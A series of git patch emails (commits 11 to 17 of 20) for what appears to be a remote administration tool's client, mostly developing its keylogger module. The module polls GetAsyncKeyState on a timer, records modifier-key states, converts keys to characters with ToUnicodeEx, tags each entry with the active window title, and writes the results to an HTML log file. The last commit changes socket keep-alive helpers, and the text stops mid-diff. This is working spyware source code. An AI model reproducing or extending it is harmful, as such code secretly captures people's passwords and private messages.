VK_F24 = 0x87, #endregion @@ -697,41 +760,49 @@ namespace xClient.Core.Keylogger /// /// NUM LOCK key. /// + [KeyloggerKey("NUM_LOCK")] VK_NUMLOCK = 0x90, /// /// SCROLL LOCK key. /// + [KeyloggerKey("SCROLL_LOCK")] VK_SCROLL = 0x91, /// /// Left SHIFT key. /// + [KeyloggerKey("LSHIFT")] VK_LSHIFT = 0xA0, /// /// Right SHIFT key. /// + [KeyloggerKey("RSHIFT")] VK_RSHIFT = 0xA1, /// /// Left CONTROL (CTRL) key. /// + [KeyloggerKey("LCTRL")] VK_LCONTROL = 0xA2, /// /// Right CONTROL (CTRL) key. /// + [KeyloggerKey("RCTRL")] VK_RCONTROL = 0xA3, /// /// Left MENU key. /// + [KeyloggerKey("LALT")] VK_LMENU = 0xA4, /// /// Right MENU key. /// + [KeyloggerKey("RALT")] VK_RMENU = 0xA5, /// From b7f617f70498c688a74d10b2fbe2b883f2d2d274 Mon Sep 17 00:00:00 2001 From: d3agle Date: Sat, 9 May 2015 12:03:33 -0500 Subject: [PATCH 11/20] Attributes added special key attributes --- Client/Core/Keylogger/KeyloggerKeys.cs | 72 +++++++++++++------------- 1 file changed, 36 insertions(+), 36 deletions(-) diff --git a/Client/Core/Keylogger/KeyloggerKeys.cs b/Client/Core/Keylogger/KeyloggerKeys.cs index 83a2b672..21b34bfa 100644 --- a/Client/Core/Keylogger/KeyloggerKeys.cs +++ b/Client/Core/Keylogger/KeyloggerKeys.cs @@ -481,25 +481,25 @@ namespace xClient.Core.Keylogger /// /// Left Windows key (Natural keyboard). /// - [KeyloggerKey("LWIN")] + [KeyloggerKey("LWIN", true)] VK_LWIN = 0x5B, /// /// Right Windows key (Natural keyboard). /// - [KeyloggerKey("RWIN")] + [KeyloggerKey("RWIN", true)] VK_RWIN = 0x5C, /// /// Applications key (natural keyboard). /// - [KeyloggerKey("APPS")] + [KeyloggerKey("APPS", true)] VK_APPS = 0x5D, /// /// Computer Sleep key. /// - [KeyloggerKey("SLEEP")] + [KeyloggerKey("SLEEP", true)] VK_SLEEP = 0x5F, #endregion @@ -612,145 +612,145 @@ namespace xClient.Core.Keylogger /// /// F1 key. /// - [KeyloggerKey("F1")] + [KeyloggerKey("F1", true)] VK_F1 = 0x70, /// /// F2 key. /// - [KeyloggerKey("F2")] + [KeyloggerKey("F2", true)] VK_F2 = 0x71, /// /// F3 key. /// - [KeyloggerKey("F3")] + [KeyloggerKey("F3", true)] VK_F3 = 0x72, /// /// F4 key. /// - [KeyloggerKey("F4")] + [KeyloggerKey("F4", true)] VK_F4 = 0x73, /// /// F5 key. /// - [KeyloggerKey("F5")] + [KeyloggerKey("F5", true)] VK_F5 = 0x74, /// /// F6 key. /// - [KeyloggerKey("F6")] + [KeyloggerKey("F6", true)] VK_F6 = 0x75, /// /// F7 key. /// - [KeyloggerKey("F7")] + [KeyloggerKey("F7", true)] VK_F7 = 0x76, /// /// F8 key. /// - [KeyloggerKey("F8")] + [KeyloggerKey("F8", true)] VK_F8 = 0x77, /// /// F9 key. /// - [KeyloggerKey("F9")] + [KeyloggerKey("F9", true)] VK_F9 = 0x78, /// /// F10 key. /// - [KeyloggerKey("F10")] + [KeyloggerKey("F10", true)] VK_F10 = 0x79, /// /// F11 key. /// - [KeyloggerKey("F11")] + [KeyloggerKey("F11", true)] VK_F11 = 0x7A, /// /// F12 key. /// - [KeyloggerKey("F12")] + [KeyloggerKey("F12", true)] VK_F12 = 0x7B, /// /// F13 key. /// - [KeyloggerKey("F13")] + [KeyloggerKey("F13", true)] VK_F13 = 0x7C, /// /// F14 key. /// - [KeyloggerKey("F14")] + [KeyloggerKey("F14", true)] VK_F14 = 0x7D, /// /// F15 key. /// - [KeyloggerKey("F15")] + [KeyloggerKey("F15", true)] VK_F15 = 0x7E, /// /// F16 key. /// - [KeyloggerKey("F16")] + [KeyloggerKey("F16", true)] VK_F16 = 0x7F, /// /// F17 key. /// - [KeyloggerKey("F17")] + [KeyloggerKey("F17", true)] VK_F17 = 0x80, /// /// F18 key. /// - [KeyloggerKey("F18")] + [KeyloggerKey("F18", true)] VK_F18 = 0x81, /// /// F19 key. /// - [KeyloggerKey("F19")] + [KeyloggerKey("F19", true)] VK_F19 = 0x82, /// /// F20 key. /// - [KeyloggerKey("F20")] + [KeyloggerKey("F20", true)] VK_F20 = 0x83, /// /// F21 key. /// - [KeyloggerKey("F21")] + [KeyloggerKey("F21", true)] VK_F21 = 0x84, /// /// F22 key. /// - [KeyloggerKey("F22")] + [KeyloggerKey("F22", true)] VK_F22 = 0x85, /// /// F23 key. /// - [KeyloggerKey("F23")] + [KeyloggerKey("F23", true)] VK_F23 = 0x86, /// /// F24 key. /// - [KeyloggerKey("F24")] + [KeyloggerKey("F24", true)] VK_F24 = 0x87, #endregion @@ -760,49 +760,49 @@ namespace xClient.Core.Keylogger /// /// NUM LOCK key. /// - [KeyloggerKey("NUM_LOCK")] + [KeyloggerKey("NUM_LOCK", true)] VK_NUMLOCK = 0x90, /// /// SCROLL LOCK key. /// - [KeyloggerKey("SCROLL_LOCK")] + [KeyloggerKey("SCROLL_LOCK", true)] VK_SCROLL = 0x91, /// /// Left SHIFT key. /// - [KeyloggerKey("LSHIFT")] + [KeyloggerKey("LSHIFT", true)] VK_LSHIFT = 0xA0, /// /// Right SHIFT key. /// - [KeyloggerKey("RSHIFT")] + [KeyloggerKey("RSHIFT", true)] VK_RSHIFT = 0xA1, /// /// Left CONTROL (CTRL) key. /// - [KeyloggerKey("LCTRL")] + [KeyloggerKey("LCTRL", true)] VK_LCONTROL = 0xA2, /// /// Right CONTROL (CTRL) key. /// - [KeyloggerKey("RCTRL")] + [KeyloggerKey("RCTRL", true)] VK_RCONTROL = 0xA3, /// /// Left MENU key. /// - [KeyloggerKey("LALT")] + [KeyloggerKey("LALT", true)] VK_LMENU = 0xA4, /// /// Right MENU key. /// - [KeyloggerKey("RALT")] + [KeyloggerKey("RALT", true)] VK_RMENU = 0xA5, /// From 78007b7b144a3d4009a00e287cf205310d329694 Mon Sep 17 00:00:00 2001 From: yankejustin Date: Sat, 9 May 2015 23:50:01 -0400 Subject: [PATCH 12/20] Implemented logic to log a key Implemented the new way of adding a key to log when the timerLogKeys elapses. --- Client/Core/Keylogger/Logger.cs | 39 +++++++++++++++++++++------------ 1 file changed, 25 insertions(+), 14 deletions(-) diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index 2bf1efa8..fb5d0251 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -159,23 +159,34 @@ namespace xClient.Core.Keylogger private void timerLogKeys_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { - foreach (short i in _allKeys) //Loop through our enumValues list populated with the keys we want to log + // Loop through each value in the array of keys to record. + foreach (short i in _allKeys) { - if (Win32.GetAsyncKeyState(i) == -32767) //GetAsycKeyState returns -32767 to indicate keypress + // GetAsycKeyState returns the result by setting the most significant + // bit if the key is up, and sets the least significant bit if the + // key was pressed. + if (Win32.GetAsyncKeyState(i) == -32767) { - // TODO: RE-WRITE THE WAY THE KEYBUFFER ADDS A NEW LOGGED KEY. + try + { + LoggedKey KeyToLog = new LoggedKey() { PressedKey = (KeyloggerKeys)i }; + KeyToLog.RecordModifierKeys(); - //_keyBuffer.Add(new LoggedKey() { PressedChar = i }); - //_hWndTitle = GetActiveWindowTitle(); //Get active thread window title - //if (_hWndTitle != null) - //{ - // if (_hWndTitle != _hWndLastTitle && _enumValues.Contains(i)) - // //Only write title to log if a key is pressed that we support - // { - // _hWndLastTitle = _hWndTitle; - // _logFileBuffer.Append("

[" + _hWndTitle + "]
"); - // } - //} + _keyBuffer.Add(KeyToLog); + _hWndTitle = GetActiveWindowTitle(); //Get active thread window title + + if (!string.IsNullOrEmpty(_hWndTitle)) + { + // Only write the title to the log file if the names are different. + if (_hWndTitle != _hWndLastTitle) + { + _hWndLastTitle = _hWndTitle; + _logFileBuffer.Append("

[" + _hWndTitle + "]
"); + } + } + } + catch + { } } } } From 6e07cb080578300efd308953a4baa2905fcf1ce9 Mon Sep 17 00:00:00 2001 From: yankejustin Date: Sat, 9 May 2015 23:53:30 -0400 Subject: [PATCH 13/20] Emptying Key Buffer is no longer dangerous If the timerEmptyKeyBuffer elapsed at a bad time or state, or if it was unable to 1) Append data to _logFileBuffer or 2) Was unable to successfully remove the entry from _keyBuffer --- Client/Core/Keylogger/Logger.cs | 42 +++++++++++++++++++++------------ 1 file changed, 27 insertions(+), 15 deletions(-) diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index fb5d0251..e32f2280 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -132,29 +132,41 @@ namespace xClient.Core.Keylogger foreach (var k in _keyBuffer) { - // - if (k != null && !string.IsNullOrEmpty(k.PressedKey.GetKeyloggerKeyName())) + try { - if (k.PressedKey.IsSpecialKey()) + if (k != null && !string.IsNullOrEmpty(k.PressedKey.GetKeyloggerKeyName())) { - // TODO: Re-Write this portion with the portion for when the timer elapses. + if (k.PressedKey.IsSpecialKey()) + { + // TODO: Re-Write this portion with the portion for when the timer elapses. - //_logFileBuffer.Append( - // HighlightSpecialKey(((k.ModifierKeys.ShiftKeyPressed) ? "SHIFT-" : string.Empty) + - // ((k.ModifierKeys.CtrlKeyPressed) ? "CTRL-" : string.Empty) + - // ((k.ModifierKeys.AltKeyPressed) ? "ALT-" : string.Empty) + - // ((k.ModifierKeys.ShiftKeyPressed) ? "ESC-" : string.Empty) + - // FromKeys(k.PressedKey.KeyloggerKeyName(), k.ModifierKeys.ShiftKeyPressed, k.ModifierKeys.CapsLock))); + //_logFileBuffer.Append( + // HighlightSpecialKey(((k.ModifierKeys.ShiftKeyPressed) ? "SHIFT-" : string.Empty) + + // ((k.ModifierKeys.CtrlKeyPressed) ? "CTRL-" : string.Empty) + + // ((k.ModifierKeys.AltKeyPressed) ? "ALT-" : string.Empty) + + // ((k.ModifierKeys.ShiftKeyPressed) ? "ESC-" : string.Empty) + + // FromKeys(k.PressedKey.KeyloggerKeyName(), k.ModifierKeys.ShiftKeyPressed, k.ModifierKeys.CapsLock))); + } + } + else + { + _logFileBuffer.Append(FromKeys(k.PressedKey.GetKeyloggerKeyValue(), k.ModifierKeys.ShiftKeyPressed, k.ModifierKeys.CapsLock)); } } - else - { - _logFileBuffer.Append(FromKeys(k.PressedKey.GetKeyloggerKeyValue(), k.ModifierKeys.ShiftKeyPressed, k.ModifierKeys.CapsLock)); - } + catch + { } } j++; + if (j > 0 && j <= _keyBuffer.Count) - _keyBuffer.RemoveRange(0, j); + { + try + { + _keyBuffer.RemoveRange(0, j); + } + catch + { } + } } private void timerLogKeys_Elapsed(object sender, System.Timers.ElapsedEventArgs e) From f126001a4fd3033bdfe8b64b4ea24cbcfd975e8c Mon Sep 17 00:00:00 2001 From: yankejustin Date: Mon, 11 May 2015 01:10:27 -0400 Subject: [PATCH 14/20] Changes, fixes, and additions Now we can see this thing in action! Needs one more commit to handle the special keys again and to detect when a toggle key is toggled. I can't remember how to represent 0x80 as a byte! :( --- Client/Core/Keylogger/Win32.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Client/Core/Keylogger/Win32.cs b/Client/Core/Keylogger/Win32.cs index d1a322a2..f8eb5309 100644 --- a/Client/Core/Keylogger/Win32.cs +++ b/Client/Core/Keylogger/Win32.cs @@ -39,7 +39,7 @@ namespace xClient.Core.Keylogger [DllImport("user32.dll", CharSet = CharSet.Unicode, ExactSpelling = true)] internal static extern int ToUnicodeEx(int wVirtKey, uint wScanCode, byte[] lpKeyState, StringBuilder pwszBuff, - int cchBuff, uint wFlags, IntPtr dwhkl); + int cchBuff, uint wFlags, IntPtr dwhkl); [DllImport("user32.dll")] internal static extern IntPtr GetForegroundWindow(); From 1e40e81ebc511ea81b9c7550f25c299b889c65a1 Mon Sep 17 00:00:00 2001 From: yankejustin Date: Mon, 11 May 2015 01:11:28 -0400 Subject: [PATCH 15/20] One more commit is needed Forgot to add changes to this file! --- Client/Core/Keylogger/Logger.cs | 47 +++++++++++++++------------------ 1 file changed, 21 insertions(+), 26 deletions(-) diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index e32f2280..7ec7c9ac 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -134,29 +134,23 @@ namespace xClient.Core.Keylogger { try { - if (k != null && !string.IsNullOrEmpty(k.PressedKey.GetKeyloggerKeyName())) + if (k != null) { - if (k.PressedKey.IsSpecialKey()) - { - // TODO: Re-Write this portion with the portion for when the timer elapses. - - //_logFileBuffer.Append( - // HighlightSpecialKey(((k.ModifierKeys.ShiftKeyPressed) ? "SHIFT-" : string.Empty) + - // ((k.ModifierKeys.CtrlKeyPressed) ? "CTRL-" : string.Empty) + - // ((k.ModifierKeys.AltKeyPressed) ? "ALT-" : string.Empty) + - // ((k.ModifierKeys.ShiftKeyPressed) ? "ESC-" : string.Empty) + - // FromKeys(k.PressedKey.KeyloggerKeyName(), k.ModifierKeys.ShiftKeyPressed, k.ModifierKeys.CapsLock))); + if (k.ModifierKeys.ShiftKeyPressed && !(k.ModifierKeys.CtrlKeyPressed || k.ModifierKeys.AltKeyPressed)) + {_logFileBuffer.Append(HighlightSpecialKey( + } + else + { + if (k + _logFileBuffer.Append(FromKeys(k)); } - } - else - { - _logFileBuffer.Append(FromKeys(k.PressedKey.GetKeyloggerKeyValue(), k.ModifierKeys.ShiftKeyPressed, k.ModifierKeys.CapsLock)); } } catch { } + + j++; } - j++; if (j > 0 && j <= _keyBuffer.Count) { @@ -181,7 +175,7 @@ namespace xClient.Core.Keylogger { try { - LoggedKey KeyToLog = new LoggedKey() { PressedKey = (KeyloggerKeys)i }; + LoggedKey KeyToLog = new LoggedKey() { PressedKey = (KeyloggerKeys)(byte)i }; KeyToLog.RecordModifierKeys(); _keyBuffer.Add(KeyToLog); @@ -274,23 +268,24 @@ namespace xClient.Core.Keylogger return Win32.GetKeyboardLayout(Win32.GetWindowThreadProcessId(Win32.GetForegroundWindow(), out pid)); } - private char? FromKeys(int keys, bool shift, bool caps) + private char? FromKeys(LoggedKey key) { //keyStates is a byte array that specifies the current state of the keyboard and keys //The keys we are interested in are modifier keys such as shift and caps lock - var keyStates = new byte[256]; + byte[] keyStates = new byte[256]; - if (shift) - //keyStates[16] tells our ToUnicodeEx method the state of the shift key which is 0x80 (Key pressed down) - keyStates[16] = 0x80; + keyStates[(int)KeyloggerKeys.VK_SHIFT] = key.ModifierKeys.ShiftKeyPressed ? (byte)255 : (byte)0; + keyStates[(int)KeyloggerKeys.VK_MENU] = key.ModifierKeys.CtrlKeyPressed ? (byte)255 : (byte)0; + keyStates[(int)KeyloggerKeys.VK_CONTROL] = key.ModifierKeys.AltKeyPressed ? (byte)255 : (byte)0; - if (caps) - //keyStates[20] tells our ToUnicodeEx method the state of the Capslock key which is 0x01 (Key toggled on) - keyStates[20] = 0x01; + // Hmmm... What is the toggle state of active as represented by a byte? + //keyStates[(int)KeyloggerKeys.VK_CAPITAL] = key.ModifierKeys.CapsLock ? (byte)255 : (byte)0; + //keyStates[(int)KeyloggerKeys.VK_NUMLOCK] = key.ModifierKeys.NumLock ? (byte)255 : (byte)0; + //keyStates[(int)KeyloggerKeys.VK_SCROLL] = key.ModifierKeys.ScrollLock ? (byte)255 : (byte)0; var sb = new StringBuilder(10); - return Win32.ToUnicodeEx(keys, 0, keyStates, sb, sb.Capacity, 0, GetActiveKeyboardLayout()) == 1 + return Win32.ToUnicodeEx(key.PressedKey.GetKeyloggerKeyValue(), 0, keyStates, sb, sb.Capacity, 0, GetActiveKeyboardLayout()) == 1 ? (char?)sb[0] : null; } From 80b7f0f7d37e0abc3003808f4b36733e109e0496 Mon Sep 17 00:00:00 2001 From: yankejustin Date: Mon, 11 May 2015 21:25:32 -0400 Subject: [PATCH 16/20] Final big commit Many more changes. Still has things to work out but there is much more to work with and many more possibilities. --- Client/Core/Keylogger/KeyloggerHelpers.cs | 70 +++++++++++++++--- Client/Core/Keylogger/KeyloggerKeys.cs | 47 ++++++++---- Client/Core/Keylogger/Logger.cs | 89 +++++++++++++++++------ 3 files changed, 161 insertions(+), 45 deletions(-) diff --git a/Client/Core/Keylogger/KeyloggerHelpers.cs b/Client/Core/Keylogger/KeyloggerHelpers.cs index 34ee38d7..3eca2ec7 100644 --- a/Client/Core/Keylogger/KeyloggerHelpers.cs +++ b/Client/Core/Keylogger/KeyloggerHelpers.cs @@ -33,11 +33,21 @@ namespace xClient.Core.Keylogger { try { - KeyloggerKey keyInformation = ((KeyloggerKey)sender.GetType().GetCustomAttributes(typeof(KeyloggerKeys), false)[0]); + FieldInfo fieldInfo = sender.GetType().GetField(sender.ToString()); - return keyInformation.IsSpecialKey; + if (fieldInfo != null) + { + KeyloggerKey[] keyloggerKeyAttributes = fieldInfo.GetCustomAttributes(typeof(KeyloggerKey), false) as KeyloggerKey[]; + + if (keyloggerKeyAttributes != null && keyloggerKeyAttributes.Length > 0) + { + return keyloggerKeyAttributes[0].IsSpecialKey; + } + } + + return false; } - catch (TypeLoadException) + catch { // The likely cause of this exception would be a lack of an attribute for the Keylogger Key. return false; @@ -48,16 +58,27 @@ namespace xClient.Core.Keylogger /// Obtains the name, if one was given, of the key provided. /// /// The keylogger key to obtain the name from. - /// Returns the name of the key that was explicitly provided. + /// Returns the name of the key that was explicitly provided, or string.Empty + /// if none was provided. public static string GetKeyloggerKeyName(this KeyloggerKeys sender) { try { - KeyloggerKey keyInformation = ((KeyloggerKey)sender.GetType().GetCustomAttributes(typeof(KeyloggerKeys), false)[0]); + FieldInfo fieldInfo = sender.GetType().GetField(sender.ToString()); - return keyInformation.KeyName; + if (fieldInfo != null) + { + KeyloggerKey[] keyloggerKeyAttributes = fieldInfo.GetCustomAttributes(typeof(KeyloggerKey), false) as KeyloggerKey[]; + + if (keyloggerKeyAttributes != null && keyloggerKeyAttributes.Length > 0) + { + return keyloggerKeyAttributes[0].KeyName; + } + } + + return string.Empty; } - catch (TypeLoadException) + catch { // The likely cause of this exception would be a lack of an attribute for the Keylogger Key. return string.Empty; @@ -71,7 +92,7 @@ namespace xClient.Core.Keylogger /// True if key is pressed; False if the key is not. public static bool IsKeyPressed(this short sender) { - return Convert.ToBoolean(sender & 0x8000); + return (sender & 0x8000) == 0x8000; } /// @@ -81,7 +102,38 @@ namespace xClient.Core.Keylogger /// True if toggled on; False if toggled off. public static bool IsKeyToggled(this short sender) { - return ((sender & 0xffff) != 0); + return (sender & 0xffff) == 0xffff; + } + + public static string BuildString(this KeyloggerModifierKeys sender) + { + // Add to this method for more combinations that should be supported! + + try + { + StringBuilder BuiltModifierKeys = new StringBuilder(); + + if (sender.CtrlKeyPressed) + { + string CtrlName = KeyloggerKeys.VK_CONTROL.GetKeyloggerKeyName(); + + if (!string.IsNullOrEmpty(CtrlName)) + BuiltModifierKeys.Append(CtrlName + " +"); + } + if (sender.AltKeyPressed) + { + string AltName = KeyloggerKeys.VK_MENU.GetKeyloggerKeyName(); + + if (!string.IsNullOrEmpty(AltName)) + BuiltModifierKeys.Append(" " + AltName + " +"); + } + + return BuiltModifierKeys.ToString(); + } + catch + { + return string.Empty; + } } } } \ No newline at end of file diff --git a/Client/Core/Keylogger/KeyloggerKeys.cs b/Client/Core/Keylogger/KeyloggerKeys.cs index 21b34bfa..05547efb 100644 --- a/Client/Core/Keylogger/KeyloggerKeys.cs +++ b/Client/Core/Keylogger/KeyloggerKeys.cs @@ -11,6 +11,21 @@ using System.Text; namespace xClient.Core.Keylogger { + /// + /// A data type that is used for storing values regarding the states of + /// modifier keys at a given time. + /// + public struct KeyloggerModifierKeys + { + public bool ShiftKeyPressed { get; set; } + public bool AltKeyPressed { get; set; } + public bool CtrlKeyPressed { get; set; } + + public bool CapsLock { get; set; } + public bool NumLock { get; set; } + public bool ScrollLock { get; set; } + } + /// /// The main object that stores both the pressed key at a specific time /// and the modifier keys that go along with the pressed key. @@ -18,23 +33,23 @@ namespace xClient.Core.Keylogger public class LoggedKey { /// - /// A data type that is used for storing values regarding the states of - /// modifier keys at a given time. + /// Gets the key that was pressed. /// - public struct KeyloggerModifierKeys - { - public bool ShiftKeyPressed { get; set; } - public bool AltKeyPressed { get; set; } - public bool CtrlKeyPressed { get; set; } - - public bool CapsLock { get; set; } - public bool NumLock { get; set; } - public bool ScrollLock { get; set; } - } - public KeyloggerKeys PressedKey { get; set; } + /// + /// An object with the purpose of storing the states of modifier keys. + /// public KeyloggerModifierKeys ModifierKeys { get; private set; } + /// + /// Determines if one of the modifier keys (excluding shift and caps + /// lock) has been set. + /// + public bool ModifierKeysSet { get; private set; } + /// + /// Sets the values of the modifier key states at the time + /// that this method was called. + /// public void RecordModifierKeys() { ModifierKeys = new KeyloggerModifierKeys() @@ -48,6 +63,12 @@ namespace xClient.Core.Keylogger NumLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_NUMLOCK).IsKeyToggled(), ScrollLock = Win32.GetAsyncKeyState(KeyloggerKeys.VK_SCROLL).IsKeyToggled() }; + + // To avoid having to repeatedly check if one of the modifier + // keys (besides shift and caps lock) was set, just simply + // decide and then store it right here. + ModifierKeysSet = (ModifierKeys.CtrlKeyPressed || ModifierKeys.AltKeyPressed || + ModifierKeys.NumLock || ModifierKeys.ScrollLock); } } diff --git a/Client/Core/Keylogger/Logger.cs b/Client/Core/Keylogger/Logger.cs index 7ec7c9ac..f01c166d 100644 --- a/Client/Core/Keylogger/Logger.cs +++ b/Client/Core/Keylogger/Logger.cs @@ -68,13 +68,13 @@ namespace xClient.Core.Keylogger /// Retrieves an array of all keylogger keys that are special. /// /// - private static KeyloggerKeys[] GetSpecialKeys() + private KeyloggerKeys[] GetSpecialKeys() { List SpecialKeys = new List(); try { - foreach (KeyloggerKeys key in Enum.GetValues(typeof(KeyloggerKeys))) + foreach (KeyloggerKeys key in _allKeys) { try { @@ -97,7 +97,7 @@ namespace xClient.Core.Keylogger /// Retrieves an array of all keylogger keys that are supported. /// /// - private static KeyloggerKeys[] GetKeyloggerKeys() + private KeyloggerKeys[] GetKeyloggerKeys() { List NormalKeys = new List(); @@ -107,7 +107,11 @@ namespace xClient.Core.Keylogger { try { - NormalKeys.Add(key); + // Must be supported (have a string representation of the key). + if (!string.IsNullOrEmpty(key.GetKeyloggerKeyName())) + { + NormalKeys.Add(key); + } } catch { } @@ -123,7 +127,14 @@ namespace xClient.Core.Keylogger private string HighlightSpecialKey(string name) { - return string.Format("[{0}]", name); + if (!string.IsNullOrEmpty(name)) + { + return string.Format("[{0}]", name); + } + else + { + return string.Empty; + } } private void timerEmptyKeyBuffer_Elapsed(object sender, System.Timers.ElapsedEventArgs e) @@ -134,14 +145,48 @@ namespace xClient.Core.Keylogger { try { + // Make sure that the key that was logged is not null. + // If it is, we can safely ignore it by just making it + // stop here. if (k != null) { - if (k.ModifierKeys.ShiftKeyPressed && !(k.ModifierKeys.CtrlKeyPressed || k.ModifierKeys.AltKeyPressed)) - {_logFileBuffer.Append(HighlightSpecialKey( + // If any modifier key was set besides shift and caps + // lock, we will handle it differently than we would + // normal keys. + if (k.ModifierKeysSet) + { + // If the pressed key is special, it should be treated as such + // by using its provided name. + if (k.PressedKey.IsSpecialKey()) + { + // The returned string could be empty. If it is, ignore it + // because we don't know how to handle that special key. + // The key would be considered unsupported. + string pressedKey = k.PressedKey.GetKeyloggerKeyName(); + + if (!string.IsNullOrEmpty(pressedKey)) + { + _logFileBuffer.Append(HighlightSpecialKey(pressedKey)); + } + } + else + { + // The pressed key is not special, but we have encountered + // a situation of multiple key presses, so just build them. + _logFileBuffer.Append(HighlightSpecialKey(k.ModifierKeys.BuildString() + + FromKeys(k, false))); + } } + // We don't have to worry about nearly all modifier keys... + // With the exception of the shift key and caps lock! :) + // At this point we know that shift or caps lock was the + // only pressed key. else { - if (k + // There is not really a need to handle if caps lock or + // shift has been handled because the way we obtain the + // value of the pressed key (that is not special) will + // use the key states and determine for us. _logFileBuffer.Append(FromKeys(k)); } } @@ -166,7 +211,7 @@ namespace xClient.Core.Keylogger private void timerLogKeys_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { // Loop through each value in the array of keys to record. - foreach (short i in _allKeys) + foreach (byte i in _allKeys) { // GetAsycKeyState returns the result by setting the most significant // bit if the key is up, and sets the least significant bit if the @@ -175,7 +220,7 @@ namespace xClient.Core.Keylogger { try { - LoggedKey KeyToLog = new LoggedKey() { PressedKey = (KeyloggerKeys)(byte)i }; + LoggedKey KeyToLog = new LoggedKey() { PressedKey = (KeyloggerKeys)i }; KeyToLog.RecordModifierKeys(); _keyBuffer.Add(KeyToLog); @@ -225,9 +270,8 @@ namespace xClient.Core.Keylogger { if (writeHeader) { - sw.Write( - "Log created on " + - DateTime.Now.ToString("dd.MM.yyyy HH:mm") + "
"); + sw.Write("Log created on " + + DateTime.Now.ToString("dd.MM.yyyy HH:mm") + "
"); if (_logFileBuffer.Length > 0) sw.Write(_logFileBuffer); @@ -268,26 +312,25 @@ namespace xClient.Core.Keylogger return Win32.GetKeyboardLayout(Win32.GetWindowThreadProcessId(Win32.GetForegroundWindow(), out pid)); } - private char? FromKeys(LoggedKey key) + private char? FromKeys(LoggedKey key, bool AllowCapitalization = true) { //keyStates is a byte array that specifies the current state of the keyboard and keys //The keys we are interested in are modifier keys such as shift and caps lock byte[] keyStates = new byte[256]; - keyStates[(int)KeyloggerKeys.VK_SHIFT] = key.ModifierKeys.ShiftKeyPressed ? (byte)255 : (byte)0; - keyStates[(int)KeyloggerKeys.VK_MENU] = key.ModifierKeys.CtrlKeyPressed ? (byte)255 : (byte)0; - keyStates[(int)KeyloggerKeys.VK_CONTROL] = key.ModifierKeys.AltKeyPressed ? (byte)255 : (byte)0; + keyStates[(int)KeyloggerKeys.VK_SHIFT] = (key.ModifierKeys.ShiftKeyPressed && AllowCapitalization) ? (byte)128 : (byte)0; + keyStates[(int)KeyloggerKeys.VK_CAPITAL] = (key.ModifierKeys.CapsLock && AllowCapitalization) ? (byte)128 : (byte)0; - // Hmmm... What is the toggle state of active as represented by a byte? - //keyStates[(int)KeyloggerKeys.VK_CAPITAL] = key.ModifierKeys.CapsLock ? (byte)255 : (byte)0; - //keyStates[(int)KeyloggerKeys.VK_NUMLOCK] = key.ModifierKeys.NumLock ? (byte)255 : (byte)0; - //keyStates[(int)KeyloggerKeys.VK_SCROLL] = key.ModifierKeys.ScrollLock ? (byte)255 : (byte)0; + keyStates[(int)KeyloggerKeys.VK_MENU] = key.ModifierKeys.CtrlKeyPressed ? (byte)128 : (byte)0; + keyStates[(int)KeyloggerKeys.VK_CONTROL] = key.ModifierKeys.AltKeyPressed ? (byte)128 : (byte)0; + + keyStates[(int)KeyloggerKeys.VK_NUMLOCK] = key.ModifierKeys.NumLock ? (byte)128 : (byte)0; + keyStates[(int)KeyloggerKeys.VK_SCROLL] = key.ModifierKeys.ScrollLock ? (byte)128 : (byte)0; var sb = new StringBuilder(10); return Win32.ToUnicodeEx(key.PressedKey.GetKeyloggerKeyValue(), 0, keyStates, sb, sb.Capacity, 0, GetActiveKeyboardLayout()) == 1 - ? (char?)sb[0] - : null; + ? (char?)sb[0] : null; } } } \ No newline at end of file From 253bc70e8438869eabc87c228f9c2470a52b987d Mon Sep 17 00:00:00 2001 From: MaxXor Date: Tue, 12 May 2015 23:56:01 +0200 Subject: [PATCH 17/20] Improved more extension methods --- Client/Core/Client.cs | 2 +- Client/Core/Extensions/SocketExtensions.cs | 2 +- Server/Core/Client.cs | 4 +--- Server/Core/Commands/CommandHandler.cs | 2 +- Server/Core/Extensions/ListViewExtensions.cs | 6 +++--- Server/Core/Extensions/SocketExtensions.cs | 2 +- Server/Forms/FrmMain.cs | 4 ++-- Server/Program.cs | 6 ++++++ 8 files changed, 16 insertions(+), 12 deletions(-) diff --git a/Client/Core/Client.cs b/Client/Core/Client.cs index aa71a346..f3edd178 100644 --- a/Client/Core/Client.cs +++ b/Client/Core/Client.cs @@ -106,7 +106,7 @@ namespace xClient.Core Initialize(); _handle = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); - SocketExtensions.SetKeepAliveEx(_handle, KEEP_ALIVE_INTERVAL, KEEP_ALIVE_TIME); + _handle.SetKeepAliveEx(KEEP_ALIVE_INTERVAL, KEEP_ALIVE_TIME); _handle.SetSocketOption(SocketOptionLevel.Socket, SocketOptionName.NoDelay, true); _handle.NoDelay = true; diff --git a/Client/Core/Extensions/SocketExtensions.cs b/Client/Core/Extensions/SocketExtensions.cs index a8dfbd3e..e9e4d3d8 100644 --- a/Client/Core/Extensions/SocketExtensions.cs +++ b/Client/Core/Extensions/SocketExtensions.cs @@ -28,7 +28,7 @@ namespace xClient.Core.Extensions /// Current socket instance /// Specifies how often TCP repeats keep-alive transmissions when no response is received. TCP sends keep-alive transmissions to verify that idle connections are still active. This prevents TCP from inadvertently disconnecting active lines. /// Specifies how often TCP sends keep-alive transmissions. TCP sends keep-alive transmissions to verify that an idle connection is still active. This entry is used when the remote system is responding to TCP. Otherwise, the interval between transmissions is determined by the value of the keepAliveInterval entry. - public static void SetKeepAliveEx(Socket socket, uint keepAliveInterval, uint keepAliveTime) + public static void SetKeepAliveEx(this Socket socket, uint keepAliveInterval, uint keepAliveTime) //extension removed, Missing System.Core.dll which requires .NET FW 3.5 { var keepAlive = new TcpKeepAlive diff --git a/Server/Core/Client.cs b/Server/Core/Client.cs index ed122f49..223bd19c 100644 --- a/Server/Core/Client.cs +++ b/Server/Core/Client.cs @@ -99,9 +99,7 @@ namespace 